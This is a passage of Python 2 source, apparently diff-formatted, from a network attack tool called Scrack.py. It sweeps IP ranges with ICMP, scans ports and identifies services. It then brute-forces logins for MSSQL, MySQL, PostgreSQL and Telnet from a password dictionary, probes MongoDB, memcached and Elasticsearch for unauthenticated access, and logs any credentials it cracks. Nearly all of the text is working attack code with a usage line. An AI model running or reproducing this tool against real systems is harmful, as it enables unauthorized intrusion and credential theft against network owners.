data="0200020000000000123456789000000000000000000000000000000000000000000000000000ZZ5440000000000000000000000000000000000000000000000000000000000X3360000000000000000000000000000000000000000000000000000000000Y373933340000000000000000000000000000000000000000000000000000040301060a09010000000002000000000070796d7373716c000000000000000000000000000000000000000000000007123456789000000000000000000000000000000000000000000000000000ZZ3360000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000Y0402000044422d4c6962726172790a00000000000d1175735f656e676c69736800000000000000000000000000000201004c000000000000000000000a000000000000000000000000000069736f5f31000000000000000000000000000000000000000000000000000501353132000000030000000000000000" + data1=data.replace(data[16:16+len(address)],address) + data2=data1.replace(data1[78:78+len(husername)],husername) + data3=data2.replace(data2[140:140+len(hpwd)],hpwd) + if lusername>=16: + data4=data3.replace('0X',str(hex(lusername)).replace('0x','')) + else: + data4=data3.replace('X',str(hex(lusername)).replace('0x','')) + if lpassword>=16: + data5=data4.replace('0Y',str(hex(lpassword)).replace('0x','')) + else: + data5=data4.replace('Y',str(hex(lpassword)).replace('0x','')) + hladd = hex(ladd).replace('0x', '') + data6=data5.replace('ZZ',str(hladd)) + data7=binascii.a2b_hex(data6) + sock.send(data7) + packet=sock.recv(1024) + if 'master' in packet: + return "username:%s,password:%s" % (user,pass_) + except: + return 3 + def mongodb(self,user,pass_): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + data = binascii.a2b_hex("3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") + s.send(data) + result = s.recv(1024) + if "ismaster" in result: + getlog_data = binascii.a2b_hex("480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") + s.send(getlog_data) + result = s.recv(1024) + if "totalLinesWritten" in result: + return "unauthorized" + else:return 3 + except Exception,e: + return 3 + def memcached(self,user,pass_): + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((self.ip,int(self.port))) + s.send("stats\r\n") + result = s.recv(1024) + if "version" in result: + return "unauthorized" + def elasticsearch(self,user,pass_): + url = "http://"+self.ip+":"+str(self.port)+"/_cat" + data = urllib2.urlopen(url).read() + if '/_cat/master' in data: + return "unauthorized" + else: + return 3 + def telnet(self,user,pass_): + try: + tn = telnetlib.Telnet(self.ip,self.port,self.timeout) + #tn.set_debuglevel(3) + time.sleep(0.5) + os = tn.read_some() + except Exception ,e: + return 3 + user_match="(?i)(login|user|username)" + pass_match='(?i)(password|pass)' + login_match='#|\$|>' + if re.search(user_match,os): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + pass + else: + try: + info=tn.read_until(user_match,timeout=2) + except Exception,e: + return 3 + if re.search(user_match,info): + try: + tn.write(str(user)+'\r\n') + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "username:%s,password:%s" % (user,pass_) + except Exception,e: + return 3 + elif re.search(pass_match,info): + tn.read_until(pass_match,timeout=2) + tn.write(str(pass_)+'\r\n') + login_info=tn.read_until(login_match,timeout=3) + tn.close() + if re.search(login_match,login_info): + return "password:%s" % (pass_) + def get_hash(self,password, scramble): + hash_stage1 = hashlib.sha1(password).digest() + hash_stage2 = hashlib.sha1(hash_stage1).digest() + to = hashlib.sha1(scramble+hash_stage2).digest() + reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)] + hash = struct.pack('20B', *reply) + return hash + def get_scramble(self,packet): + scramble,plugin = '','' + try: + tmp = packet[15:] + m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) + if len(m)>3:del m[0] + scramble = m[0] + m[1] + except: + return '','' + try: + plugin = m[2] + except: + pass + return plugin,scramble + def get_auth_data(self,user,password,scramble,plugin): + user_hex = binascii.b2a_hex(user) + pass_hex = binascii.b2a_hex(self.get_hash(password,scramble)) + data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex + if plugin:data+=binascii.b2a_hex(plugin)+ "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" + len_hex = hex(len(data)/2).replace("0x","") + auth_data = len_hex + "000001" +data + return binascii.a2b_hex(auth_data) + def make_response(self,buf,username,password,salt): + pu=hashlib.md5(password+username).hexdigest() + buf=hashlib.md5(pu+salt).hexdigest() + return 'md5'+buf +class SendPingThr(threading.Thread): + def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3): + threading.Thread.__init__(self) + self.Sock = icmpSocket + self.ipPool = ipPool + self.packet = icmpPacket + self.timeout = timeout + self.Sock.settimeout(timeout + 1) + def run(self): + time.sleep(0.01) + for ip in self.ipPool: + try: + self.Sock.sendto(self.packet, (ip, 0)) + except socket.timeout: + break + time.sleep(self.timeout) + +class Nscan: + def __init__(self, timeout=3): + self.timeout = timeout + self.__data = struct.pack('d', time.time()) + self.__id = os.getpid() + if self.__id >= 65535:self.__id = 65534 + @property + def __icmpSocket(self): + Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp")) + return Sock + + def __inCksum(self, packet): + if len(packet) & 1: + packet = packet + '\0' + words = array.array('h', packet) + sum = 0 + for word in words: + sum += (word & 0xffff) + sum = (sum >> 16) + (sum & 0xffff) + sum = sum + (sum >> 16) + return (~sum) & 0xffff + + @property + def __icmpPacket(self): + header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0) + packet = header + self.__data + chkSum = self.__inCksum(packet) + header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0) + return header + self.__data + + def mPing(self, ipPool): + Sock = self.__icmpSocket + Sock.settimeout(self.timeout) + packet = self.__icmpPacket + recvFroms = set() + sendThr = SendPingThr(ipPool, packet, Sock, self.timeout) + sendThr.start() + while True: + try: + ac_ip = Sock.recvfrom(1024)[1][0] + if ac_ip not in recvFroms: + log("active",ac_ip,0,None) + recvFroms.add(ac_ip) + except Exception: + pass + finally: + if not sendThr.isAlive(): + break + return recvFroms & ipPool +def get_ac_ip(ip_list): + try: + s = Nscan() + ipPool = set(ip_list) + return s.mPing(ipPool) + except Exception,e: + print 'The current user permissions unable to send icmp packets' + return ip_list +class ThreadNum(threading.Thread): + def __init__(self,queue): + threading.Thread.__init__(self) + self.queue = queue + def run(self): + while True: + try: + if queue.empty():break + queue_task = self.queue.get() + except: + break + try: + task_type,task_host,task_port = queue_task.split(":") + if task_type == 'portscan': + data = scan_port(task_host,task_port) + if data: + server_name = server_discern(task_host,task_port,data) + if server_name: + log('discern',task_host,task_port,server_name) + queue.put(":".join([server_name,task_host,task_port])) + else: + result = pass_crack(task_type,task_host,task_port) + if result and result !=3:log(task_type,task_host,task_port,result) + except Exception,e: + continue +def scan_port(host,port): + try: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.connect((str(host),int(port))) + log('portscan',host,port) + except Exception,e: + return False + try: + data = sock.recv(512) + if len(data) > 2: + return data + else: + sock.send('a\n\n') + data = sock.recv(512) + sock.close() + if len(data) > 2: + return data + else: + return 'NULL' + except Exception,e: + sock.close() + return 'NULL' +def log(scan_type,host,port,info=''): + mutex.acquire() + time_str = time.strftime('%X', time.localtime( time.time())) + if scan_type == 'portscan': + print "[%s] %s:%d open"%(time_str,host,int(port)) + elif scan_type == 'discern': + print "[%s] %s:%d is %s"%(time_str,host,int(port),info) + elif scan_type == 'active': + print "[%s] %s active" % (time_str, host) + elif info: + log = "[*%s] %s:%d %s %s"%(time_str,host,int(port),scan_type,info) + print log + log_file = open('result.log','a') + log_file.write(log+"\r\n") + log_file.close() + mutex.release() +def server_discern(host,port,data): + for mark_info in REGEX: + try: + name,default_port,reg = mark_info + if reg and data <> 'NULL': + matchObj = re.search(reg,data,re.I|re.M) + if matchObj: + return name + elif int(default_port) == int(port): + return name + except Exception,e: + #print e + continue +def pass_crack(server_type,host,port): + m = Crack(host,port,server_type,TIMEOUT) + return m.run() +def get_password_dic(path): + pass_list = [] + try: + file_ = open(path,'r') + for password in file_: + pass_list.append(password.strip()) + file_.close() + return pass_list + except: + return 'read dic error' +def get_ip_list(ip): + ip_list = [] + iptonum = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])]) + numtoip = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)]) + if '-' in ip: + ip_range = ip.split('-') + ip_start = long(iptonum(ip_range[0])) + ip_end = long(iptonum(ip_range[1])) + ip_count = ip_end - ip_start + if ip_count >= 0 and ip_count <= 65536: + for ip_num in range(ip_start,ip_end+1): + ip_list.append(numtoip(ip_num)) + else: + print '-h wrong format' + elif '.ini' in ip: + ip_config = open(ip,'r') + for ip in ip_config: + ip_list.extend(get_ip_list(ip.strip())) + ip_config.close() + else: + ip_split=ip.split('.') + net = len(ip_split) + if net == 2: + for b in range(1,255): + for c in range(1,255): + ip = "%s.%s.%d.%d"%(ip_split[0],ip_split[1],b,c) + ip_list.append(ip) + elif net == 3: + for c in range(1,255): + ip = "%s.%s.%s.%d"%(ip_split[0],ip_split[1],ip_split[2],c) + ip_list.append(ip) + elif net ==4: + ip_list.append(ip) + else: + print "-h wrong format" + return ip_list +def t_join(m_count): + tmp_count = 0 + i = 0 + if I < m_count: + count = len(ip_list) + 1 + else: + count = m_count + while True: + time.sleep(4) + ac_count = threading.activeCount() + #print ac_count,count + if ac_count < count and ac_count == tmp_count: + i+=1 + else: + i=0 + tmp_count = ac_count + #print ac_count,queue.qsize() + if (queue.empty() and threading.activeCount() <= 1) or i > 5: + break +def put_queue(ip_list,port_list): + for ip in ip_list: + for port in port_list: + queue.put(":".join(['portscan',ip,port])) +if __name__=="__main__": + msg = ''' +Usage: python Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-d pass.txt] [-n] + ''' + if len(sys.argv) < 2: + print msg + try: + options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:d:n") + ip = '' + port = '21,23,1433,3306,5432,6379,9200,11211,27017' + m_count = 100 + ping = True + for opt,arg in options: + if opt == '-h': + ip = arg + elif opt == '-p': + port = arg + elif opt == '-m': + m_count = int(arg) + elif opt == '-t': + TIMEOUT = int(arg) + elif opt == '-n': + ping = False + elif opt == '-d': + PASSWORD_DIC = get_password_dic(arg) + socket.setdefaulttimeout(TIMEOUT) + if ip: + ip_list = get_ip_list(ip) + if ping:ip_list = get_ac_ip(ip_list) + port_list = port.split(',') + for ip_str in ip_list: + for port_int in port_list: + I+=1 + queue.put(':'.join(['portscan',ip_str,port_int])) + for i in range(m_count): + t = ThreadNum(queue) + t.setDaemon(True) + t.start() + t_join(m_count) + except Exception,e: + print msg